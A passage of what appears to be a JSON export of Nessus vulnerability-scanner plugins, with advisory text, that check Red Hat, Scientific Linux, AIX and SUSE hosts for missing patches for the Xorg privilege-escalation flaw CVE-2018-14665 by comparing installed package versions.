value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-Xwayland\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3410\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-Xdmx-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xdmx-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-Xephyr-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xephyr-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-Xnest-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xnest-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xorg-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-Xvfb-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xvfb-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-Xwayland-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xwayland-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-common-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-common-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"xorg-x11-server-debuginfo-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"xorg-x11-server-debuginfo-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-debuginfo-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"i686\", reference:\"xorg-x11-server-devel-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-devel-1.20.1-5.1.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"xorg-x11-server-source-1.20.1-5.1.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-18T02:49:10", "description": "Security Fix(es) :\n\n - xorg-x11-server: Incorrect permission check in Xorg X\n server allows for privilege escalation (CVE-2018-14665)\n\nThe SL Team added a fix for upstream bug 1650634", "edition": 11, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-11-27T00:00:00", "title": "Scientific Linux Security Update : xorg-x11-server on SL7.x x86_64 (20181031)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2018-11-27T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xnest", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-source", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-debuginfo", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xephyr", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-devel", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xvfb", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xwayland", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xdmx", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xorg", "p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-common"], "id": "SL_20181031_XORG_X11_SERVER_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/119207", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119207);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-14665\");\n\n script_name(english:\"Scientific Linux Security Update : xorg-x11-server on SL7.x x86_64 (20181031)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - xorg-x11-server: Incorrect permission check in Xorg X\n server allows for privilege escalation (CVE-2018-14665)\n\nThe SL Team added a fix for upstream bug 1650634\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1811&L=scientific-linux-errata&F=&S=&P=806\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88ddb2fe\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID privilege escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xdmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xephyr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xnest\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xvfb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-Xwayland\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/11/27\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xdmx-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xephyr-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xnest-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xorg-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xvfb-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-Xwayland-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-common-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-debuginfo-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"xorg-x11-server-devel-1.20.1-5.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"xorg-x11-server-source-1.20.1-5.1.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xorg-x11-server-Xdmx / xorg-x11-server-Xephyr / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:15:31", "description": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.", "edition": 20, "published": "2018-12-13T00:00:00", "title": "AIX 7.2 TL 3 : xorg (IJ11550)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.2"], "id": "AIX_IJ11550.NASL", "href": "https://www.tenable.com/plugins/nessus/119632", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory xorg_advisory3.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119632);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/04/25 9:51:46\");\n\n script_cve_id(\"CVE-2018-14665\");\n\n script_name(english:\"AIX 7.2 TL 3 : xorg (IJ11550)\");\n script_summary(english:\"Check for APAR IJ11550\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID logfile Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.2\", ml:\"03\", patch:\"IJ11550s0a\", package:\"X11.base.rte\", minfilesetver:\"7.2.3.0\", maxfilesetver:\"7.2.3.15\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T01:15:31", "description": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.", "edition": 20, "published": "2018-12-13T00:00:00", "title": "AIX 7.2 TL 0 : xorg (IJ11546)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:ibm:aix:7.2"], "id": "AIX_IJ11546.NASL", "href": "https://www.tenable.com/plugins/nessus/119629", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text in the description was extracted from AIX Security\n# Advisory xorg_advisory3.asc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119629);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/04/25 9:51:46\");\n\n script_cve_id(\"CVE-2018-14665\");\n\n script_name(english:\"AIX 7.2 TL 0 : xorg (IJ11546)\");\n script_summary(english:\"Check for APAR IJ11546\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote AIX host is missing a security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14665 X.Org X\nserver could allow a remote authenticated attacker to gain elevated\nprivileges on the system, caused by improper validation of command\nline parameters. An attacker could exploit this vulnerability using\nthe -modulepath argument or the -logfile argument to overwrite\narbitrary files and execute unprivileged code on the system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://aix.software.ibm.com/aix/efixes/security/xorg_advisory3.asc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Install the appropriate interim fix.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID logfile Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:ibm:aix:7.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"AIX Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/AIX/lslpp\", \"Host/local_checks_enabled\", \"Host/AIX/version\");\n\n exit(0);\n}\n\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"aix.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif ( ! get_kb_item(\"Host/AIX/version\") ) audit(AUDIT_OS_NOT, \"AIX\");\nif ( ! get_kb_item(\"Host/AIX/lslpp\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nif ( get_kb_item(\"Host/AIX/emgr_failure\" ) ) exit(0, \"This iFix check is disabled because : \"+get_kb_item(\"Host/AIX/emgr_failure\") );\n\nflag = 0;\n\nif (aix_check_ifix(release:\"7.2\", ml:\"00\", patch:\"IJ11546s0a\", package:\"X11.base.rte\", minfilesetver:\"7.2.0.0\", maxfilesetver:\"7.2.0.1\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:aix_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-14T06:16:17", "description": "This update for xorg-x11-server fixes the following issues :\n\nCVE-2018-14665: Disable -logfile and -modulepath when running with\nelevated privileges (bsc#1112020,\n\nNote that SUSE by default does not run with elevated privileges, so\nthe default installation is not affected by this problem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-01-02T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : xorg-x11-server (SUSE-SU-2018:3680-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14665"], "modified": "2019-01-02T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:xorg-x11-server-sdk", "p-cpe:/a:novell:suse_linux:xorg-x11-server", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:xorg-x11-server-source", "p-cpe:/a:novell:suse_linux:xorg-x11-server-extra-debuginfo", "p-cpe:/a:novell:suse_linux:xorg-x11-server-extra", "p-cpe:/a:novell:suse_linux:xorg-x11-server-debuginfo", "p-cpe:/a:novell:suse_linux:xorg-x11-server-debugsource"], "id": "SUSE_SU-2018-3680-1.NASL", "href": "https://www.tenable.com/plugins/nessus/120159", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3680-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(120159);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2018-14665\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : xorg-x11-server (SUSE-SU-2018:3680-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for xorg-x11-server fixes the following issues :\n\nCVE-2018-14665: Disable -logfile and -modulepath when running with\nelevated privileges (bsc#1112020,\n\nNote that SUSE by default does not run with elevated privileges, so\nthe default installation is not affected by this problem.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1112020\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-14665/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183680-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2b1817e0\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 15:zypper in -t patch\nSUSE-SLE-Product-WE-15-2018-2617=1\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2018-2617=1\n\nSUSE Linux Enterprise Module for Development Tools 15:zypper in -t\npatch SUSE-SLE-Module-Development-Tools-15-2018-2617=1\n\nSUSE Linux Enterprise Module for Basesystem 15:zypper in -t patch\nSUSE-SLE-Module-Basesystem-15-2018-2617=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Xorg X11 Server SUID privilege escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xorg-x11-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xorg-x11-server-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xorg-x11-server-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xorg-x11-server-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xorg-x11-server-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xorg-x11-server-sdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:xorg-x11-server-source\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n 